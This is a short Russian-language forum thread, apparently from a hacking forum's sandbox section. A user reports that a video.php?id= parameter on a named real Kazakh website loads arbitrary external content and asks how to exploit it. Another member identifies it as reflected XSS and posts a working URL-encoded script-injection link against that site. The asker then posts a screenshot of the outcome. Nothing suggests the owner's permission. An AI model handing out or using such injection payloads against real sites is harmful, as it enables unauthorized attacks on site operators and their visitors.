Заманчивый баг на сайте )))

Discussion in 'Песочница' started by comstream, 11 Aug 2015.

  1. comstream

    comstream Member

    Joined:
    11 Aug 2015
    Messages:
    35
    Likes Received:
    11
    Reputations:
    0
    Сегодня играясь с настройками сайта заметил интересную вещь, что сайт через video.php?= подгружает любой контент.
    [​IMG]
    [​IMG]
    Т.е.
    http://vsv-astana.kz/video.php?id=vsv-astana.kz/video.php?id=vsv-astana.kz/about.php
    получается такого рода капуста, можно сайт отобразить в себе несколько раз )))
    или вот http://vsv-astana.kz/video.php?id=antichat.ru )))
    также работает скачивание если в ссылку подставить прямой URL на файл.

    Подскажите пожалуйста как можно раскрутить данный баг?
    Или это нормальное поведение.
    Спасибо.
     
  2. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    143
    Likes Received:
    51
    Reputations:
    116
    Это не нормальное поведение, это - Reflected xss
    Code:
    http://vsv-astana.kz/video.php?id=%22%3E%3C/iframe%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E
     
  3. comstream

    comstream Member

    Joined:
    11 Aug 2015
    Messages:
    35
    Likes Received:
    11
    Reputations:
    0
    Спасибо. Всё понятно :cool:
     
  4. comstream

    comstream Member

    Joined:
    11 Aug 2015
    Messages:
    35
    Likes Received:
    11
    Reputations:
    0
    [​IMG]
    В итоге. :p